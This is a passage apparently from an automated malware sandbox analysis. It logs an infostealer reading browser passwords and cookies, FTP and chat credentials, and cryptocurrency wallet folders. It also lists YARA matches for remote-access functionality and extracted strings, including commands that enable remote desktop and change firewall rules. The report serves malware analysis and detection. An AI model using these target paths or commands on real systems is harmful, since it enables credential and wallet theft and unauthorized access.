                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\BGyrAWawDeMTcIdcViWNDxvVFplcVQNCSzhMZfEKcqjQHnGwGkZEqIjldUPMmMbvOydmBpQ\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\BGyrAWawDeMTcIdcViWNDxvVFplcVQNCSzhMZfEKcqjQHnGwGkZEqIjldUPMmMbvOydmBpQ\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xml
                              Source: Yara matchFile source: 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002C.00000002.3006898229.00000000034C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: D7AB.tmp.ssg.exe PID: 4444, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 17.0.D7AB.tmp.ssg.exe.5c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: D7AB.tmp.ssg.exe PID: 4444, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe, type: DROPPED
                              Source: explorer.exe, 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: net start termservice
                              Source: explorer.exe, 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                              Source: EC2F.tmp.gfx.exeString found in binary or memory: net start termservice
                              Source: EC2F.tmp.gfx.exe, 00000012.00000003.2327914131.0000000004471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: net start termservice
                              Source: EC2F.tmp.gfx.exe, 00000012.00000003.2327914131.0000000004471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                              Source: EC2F.tmp.gfx.exe, 00000012.00000000.2315198488.00000000006E1000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: net start termservice
                              Source: EC2F.tmp.gfx.exe, 00000012.00000000.2315198488.00000000006E1000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                              Source: EC2F.tmp.gfx.exe, 00000012.00000002.2331733029.00000000006E1000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: net start termservice
                              Source: EC2F.tmp.gfx.exe, 00000012.00000002.2331733029.00000000006E1000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n 